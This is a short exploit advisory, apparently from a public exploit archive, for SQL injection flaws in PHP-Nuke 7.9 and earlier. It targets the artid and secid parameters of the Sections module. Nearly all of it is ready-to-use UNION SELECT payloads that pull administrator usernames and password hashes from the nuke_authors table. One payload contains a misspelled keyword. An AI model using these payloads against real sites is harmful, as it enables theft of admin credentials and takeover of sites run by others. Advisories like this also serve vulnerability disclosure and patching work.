[*]================================================================================[*] | _____ _ _ _ _____ | | |_ _| |__ (_)_ __ __| | | ____| _ ___ | | | | | '_ \| | '__/ _` | | _|| | | |/ _ \ | | | | | | | | | | | (_| | | |__| |_| | __/ | | |_| |_| |_|_|_| \__,_| |_____\__, |\___| | | |___/ | | ____ _ _ | | / ___| ___ ___ _ _ _ __(_) |_ _ _ | | \___ \ / _ \/ __| | | | '__| | __| | | | | | ___) | __/ (__| |_| | | | | |_| |_| | | | |____/ \___|\___|\__,_|_| |_|\__|\__, | | | |___/ | [*]================================================================================[*] | Author: StAkeR ~ StAkeR@hotmail.it | [*]================================================================================[*] | Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen | [*]================================================================================[*] | PHP-Nuke <= 7.9 Multiple SQL Injection Vulnerabilities (artid and secid) | [*]================================================================================[*] | Artid | | Module: modules.php?name=Sections&op=viewarticle&artid= [SQL] | | CodeSQL: 1+union+all+select+1,2,aid,pwd,5+from+nuke_authors+limit+1,1-- | [*]================================================================================[*] | Secid | | Module: modules.php?name=Sections&op=listarticles&secid= [SQL] | | PwdSQL: 1+union+all+select+pwd+from+nuke_authors+limit+1,1-- | | AidSQL: 1+union+all+selec+aid+from+nuke_authors+limit+1,1-- | [*]================================================================================[*]